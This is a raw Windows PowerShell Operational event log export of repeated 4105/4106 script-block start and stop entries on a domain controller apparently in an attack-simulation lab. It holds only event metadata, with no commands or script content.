Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1470567
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1470566
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1470565
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1470564
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1470563
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1470562
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1470561
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1470560
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1470559
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1470558
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1470557
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1470556
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1470555
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1470554
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1470553
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1470552
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1470551
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1470550
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1470549
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1470548
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1470547
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1470546
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1470545
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1470544
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1470543
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1470542
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1470541
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1470540
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1470539
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1470538
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1470537
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1470536
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1470535
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1470534
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1470533
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1470532
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1470531
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1470530
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1470529
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1470528
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1470527
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1470526
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1470525
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1470524
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1470523
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1470522
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1470521
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1470520
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1470519
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1470518
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1470517
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1470516
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1470515
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1470514
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1470513
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
